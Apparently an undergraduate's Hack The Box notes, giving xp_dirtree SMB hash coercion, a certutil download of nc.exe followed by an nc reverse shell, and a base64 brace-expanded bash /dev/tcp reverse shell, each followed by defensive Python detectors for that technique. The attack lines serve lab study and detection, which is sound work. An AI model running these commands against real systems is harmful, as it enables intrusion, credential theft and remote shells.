Undergrad CyberSec Notes

General Tips


Last updated 4 years ago


Getting a connection back via SQL injection to capture a password hash (xp_dirtree makes the SQL Server service account authenticate to the UNC path):

EXEC MASTER.sys.xp_dirtree '\\10.10.14.209\fakeshare'
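From the defender's side, the call above is worth alerting on: a call to xp_dirtree (or xp_fileexist / xp_subdirs) with a UNC path makes the SQL Server service account authenticate to that host, so any statement naming a share that is not a known file server is a coercion attempt, regardless of whether the address looks internal. The Python below is an added example, not part of these notes, that scans constructed audit statements for such calls; the allowlist, the network ranges and the sample statements are assumptions.

```python
import ipaddress
import re

# Constructed sample (principal, statement text) pairs, as a SQL Server audit
# or Extended Events session might record them; not real log data.
SAMPLE_STATEMENTS = [
    ("webapp_svc", "EXEC MASTER.sys.xp_dirtree '\\\\10.10.14.209\\fakeshare'"),
    ("backup_svc", "EXEC master.sys.xp_dirtree '\\\\fs01.corp.example\\backups'"),
    ("webapp_svc", "SELECT name FROM sys.databases"),
    ("webapp_svc", "exec xp_fileexist '\\\\203.0.113.7\\x\\a.txt'"),
]

# Assumed environment facts: the only file server SQL Server should ever touch,
# and the address ranges that count as internal.
ALLOWED_UNC_HOSTS = {"fs01.corp.example"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Extended procedures that open a UNC path and therefore trigger outbound
# SMB authentication; capture the host portion of '\\host\share...'.
UNC_CALL_RE = re.compile(
    r"\b(xp_dirtree|xp_fileexist|xp_subdirs)\b[^'\"]*['\"]\s*\\\\([^\\'\"\s]+)\\",
    re.IGNORECASE,
)


def classify_host(host):
    """Label the UNC host: allowlisted name, unknown name, internal or external IP."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "allowlisted" if host.lower() in ALLOWED_UNC_HOSTS else "unknown-name"
    return "internal-ip" if any(ip in net for net in INTERNAL_NETS) else "external-ip"


def detect_unc_coercion(principal, statement):
    """Return a finding dict if the statement forces SMB auth to a UNC host, else None."""
    match = UNC_CALL_RE.search(statement)
    if not match:
        return None
    proc, host = match.group(1).lower(), match.group(2)
    kind = classify_host(host)
    # Anything not on the allowlist is high: a raw IP (internal or not) is never
    # a legitimate file-server reference from application SQL.
    severity = "info" if kind == "allowlisted" else "high"
    return {"principal": principal, "proc": proc, "host": host,
            "host_kind": kind, "severity": severity}


def scan(statements):
    """Run the detector over (principal, statement) pairs and keep the hits."""
    findings = []
    for principal, statement in statements:
        finding = detect_unc_coercion(principal, statement)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_STATEMENTS):
        print(f"[{f['severity']}] {f['principal']} called {f['proc']} "
              f"against \\\\{f['host']} ({f['host_kind']})")
```

Beyond detection, the two controls that remove the risk are revoking EXECUTE on these extended procedures from accounts that do not need them and blocking outbound TCP 445 from database hosts at the perimeter, so the coerced authentication never reaches a listener.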

There are many ways to spell "password" in code; make sure you check each spelling when searching the source (this example greps for "passwd"):

find . -name "*.php" -print0 | xargs -0 grep -i -n "passwd"
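The same idea applied before deployment: a small scanner, added here as an example and not part of these notes, that checks source files for credential-like identifiers under every common spelling and reports where a quoted literal is assigned to them, without echoing the secret itself. The PHP snippets are constructed, and the spelling list is an assumption to extend for your own codebase.

```python
import re

# Constructed PHP snippets standing in for files under a web root (not from any real target).
SAMPLE_FILES = {
    "config.php": "<?php\n$db_host = 'localhost';\n$db_pass = 'S3cret!';\n$DB_PASSWORD = \"hunter2\";\n",
    "auth.php": "<?php\nif (password_verify($input, $hash)) { login(); }\n$pwd = getenv('APP_PWD');\n",
    "index.php": "<?php\necho 'hello';\n",
}

# Assumed list of spellings; longer variants come before "pass" so the most
# specific one is reported when several could match the same identifier.
SPELLINGS = ("passwd", "password", "passphrase", "pass", "pwd", "secret")

# An identifier containing one of the spellings, assigned a single- or double-quoted literal.
HARDCODED_RE = re.compile(
    r"\$?(\w*(?:" + "|".join(SPELLINGS) + r")\w*)\s*=\s*(['\"])(.*?)\2",
    re.IGNORECASE,
)


def scan_text(name, text):
    """Return (file, line_no, identifier, spelling) for each hard-coded credential literal."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for match in HARDCODED_RE.finditer(line):
            ident = match.group(1)
            spelling = next(s for s in SPELLINGS if s in ident.lower())
            # Only the identifier and location are reported; the literal value is never surfaced.
            hits.append((name, line_no, ident, spelling))
    return hits


def scan_tree(files):
    """Scan a {path: content} mapping, mirroring `find ... | xargs grep` over a checkout."""
    findings = []
    for name, text in files.items():
        findings.extend(scan_text(name, text))
    return findings


if __name__ == "__main__":
    for path, line_no, ident, spelling in scan_tree(SAMPLE_FILES):
        print(f"{path}:{line_no}: hard-coded credential in ${ident} (spelling: {spelling})")
```

Note that `$pwd = getenv('APP_PWD')` in the constructed auth.php is deliberately not reported: a value pulled from the environment at runtime is the remediation for a hard-coded one, so the regex only fires on quoted literals.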

Transferring Files to Windows Via Windows Command Execution

On the attacker PC, host the payload on a simple web server.

Next, download the file onto the victim's PC via RCE using certutil:

python exploit.py -u "admin@htb.local" -p "baconandchesse" -i "http://10.10.10.180" -c powershell.exe -a "/c certutil -urlcache -split -f http://10.10.14.34:8000/nc.exe c:/windows/temp/nc.exe"

Next, set up a listener on the attacker PC.

Next, on the victim PC, launch the newly downloaded nc.exe and connect back to the attacker PC:

python exploit.py -u "admin@htb.local" -p "baconandchesse" -i "http://10.10.10.180" -c powershell.exe -a "/c c:/windows/temp/nc.exe 10.10.14.34 8090 -e cmd.exe"
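Seen from the host-monitoring side, the two steps above leave a clear process-creation trail: certutil.exe run with -urlcache and an http URL writing to a temp path, then a process starting from that same path with nc-style `<host> <port> -e cmd.exe` arguments. The Python below is an added example, not code from these notes, that runs both checks over constructed Sysmon-style events and correlates the download with the later execution; the field names and the sample events are assumptions.

```python
import re

# Constructed process-creation events in a Sysmon Event ID 1-like shape (field names assumed).
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f http://10.10.14.34:8000/nc.exe c:/windows/temp/nc.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"ProcessId": 4188, "Image": r"C:\Windows\Temp\nc.exe",
     "CommandLine": "c:/windows/temp/nc.exe 10.10.14.34 8090 -e cmd.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"ProcessId": 2200, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -hashfile C:\tools\setup.msi SHA256",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# '<host> <port> -e <shell>': the classic netcat command-execution argument shape.
NC_EXEC_RE = re.compile(r"(\S+)\s+(\d{1,5})\s+-e\s+(cmd(?:\.exe)?|powershell(?:\.exe)?)\b",
                        re.IGNORECASE)


def norm_path(path):
    """Normalise a Windows path for comparison: lower-case, backslash separators."""
    return path.lower().replace("/", "\\")


def detect_certutil_download(ev):
    """certutil.exe used as a downloader: -urlcache plus a remote URL, writing to disk."""
    if not norm_path(ev["Image"]).endswith("\\certutil.exe"):
        return None
    cmd = ev["CommandLine"]
    url = URL_RE.search(cmd)
    if "urlcache" not in cmd.lower() or not url:
        return None
    return {"rule": "certutil_urlcache_download", "pid": ev["ProcessId"],
            "url": url.group(0), "dest": cmd.split()[-1], "parent": ev["ParentImage"]}


def detect_nc_exec(ev):
    """Any binary launched with '<host> <port> -e <shell>' arguments."""
    m = NC_EXEC_RE.search(ev["CommandLine"])
    if not m:
        return None
    return {"rule": "nc_exec_reverse_shell", "pid": ev["ProcessId"], "image": ev["Image"],
            "host": m.group(1), "port": int(m.group(2)), "shell": m.group(3)}


def triage(events):
    """Run every rule over every event and collect the findings in event order."""
    findings = []
    for ev in events:
        for rule in (detect_certutil_download, detect_nc_exec):
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


def correlate_download_exec(events):
    """Pair a certutil download with any later process whose Image is the downloaded file."""
    downloads = {}
    chains = []
    for ev in events:
        hit = detect_certutil_download(ev)
        if hit:
            downloads[norm_path(hit["dest"])] = hit["pid"]
            continue
        src_pid = downloads.get(norm_path(ev["Image"]))
        if src_pid is not None:
            chains.append((src_pid, ev["ProcessId"]))
    return chains


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f)
    print("download-then-execute chains:", correlate_download_exec(SAMPLE_EVENTS))
```

The correlation is the part worth keeping: a lone certutil download has benign explanations, but a file fetched by certutil and executed minutes later from a world-writable directory almost never does, and the parent being powershell.exe spawned by a web application process is the context an analyst will want alongside it.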

RCE Payload Workarounds:

java.lang.Runtime.exec (runs the command without a shell, so pipes, redirects and spaces in arguments need the brace-expansion workaround below):

// RCE COMMAND
johnd@kali:~/HackTheBox$ echo 'bash -i >& /dev/tcp/10.10.14.14/8899 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNC84ODk5IDA+JjEK

// PAYLOAD
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNC84ODk5IDA+JjEK}|{base64,-d}|{bash,-i}
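The brace-expansion trick also defeats naive command-line signatures, because neither "bash -i" nor "/dev/tcp" appears in the logged command. A detection therefore has to undo the expansion and decode the embedded base64 before matching, which is what the Python below does. It is an added example, not part of these notes; the command lines it processes are constructed (the first reuses the payload shape shown above), and the indicator list is an assumption.

```python
import base64
import re

# Constructed command lines as Linux process telemetry (auditd/EDR) might record them; not real data.
SAMPLE_COMMANDS = [
    "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNC84ODk5IDA+JjEK}|{base64,-d}|{bash,-i}",
    "bash -c echo hello && ls -la /var/www",
    "sh -c {echo,aGVsbG8gd29ybGQK}|{base64,-d}",
]

BRACE_GROUP = re.compile(r"\{([^{}]*)\}")            # {echo,X} style brace-expansion groups
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")  # long base64-looking runs
# Substrings that identify an interactive shell being wired to a network socket.
INDICATORS = ("/dev/tcp/", "/dev/udp/", "bash -i", "nc -e")


def expand_braces(cmd):
    """Undo the obfuscation: '{echo,X}|{base64,-d}' becomes 'echo X|base64 -d'."""
    return BRACE_GROUP.sub(lambda m: m.group(1).replace(",", " "), cmd)


def decode_b64_tokens(text):
    """Decode every base64-looking token that yields valid UTF-8; ignore the rest."""
    decoded = []
    for token in B64_TOKEN.findall(text):
        body = token.rstrip("=")
        body += "=" * (-len(body) % 4)  # repair missing or stray padding before decoding
        try:
            decoded.append(base64.b64decode(body, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def analyze(cmd):
    """Expand, decode and score one command line; 'suspicious' needs a decoder and an indicator."""
    expanded = expand_braces(cmd)
    decoded = decode_b64_tokens(expanded)
    indicators = sorted({ind for text in decoded for ind in INDICATORS if ind in text})
    uses_decoder = re.search(r"base64\s+(-d|--decode)\b", expanded) is not None
    return {"expanded": expanded, "decoded": decoded, "indicators": indicators,
            "suspicious": uses_decoder and bool(indicators)}


def scan(commands):
    """Return only the command lines that decode to a reverse-shell indicator."""
    return [cmd for cmd in commands if analyze(cmd)["suspicious"]]


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        result = analyze(cmd)
        print(result["suspicious"], result["indicators"], result["expanded"])
```

Requiring both a base64 decoder in the expanded command and an indicator in the decoded text keeps the rule quiet on ordinary scripts that pipe through base64 (the third constructed sample decodes to plain text and is not flagged) while still catching the padding-damaged variants that a decoder on the victim would tolerate.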

https://0xrick.github.io/hack-the-box/giddy/
[Screenshots from the original page: hosting nc.exe on the attacker PC; RCE on the Windows host; log on the attacker PC showing the file successfully downloaded; nc listener on port 8090; calling nc.exe; reverse shell successfully gained]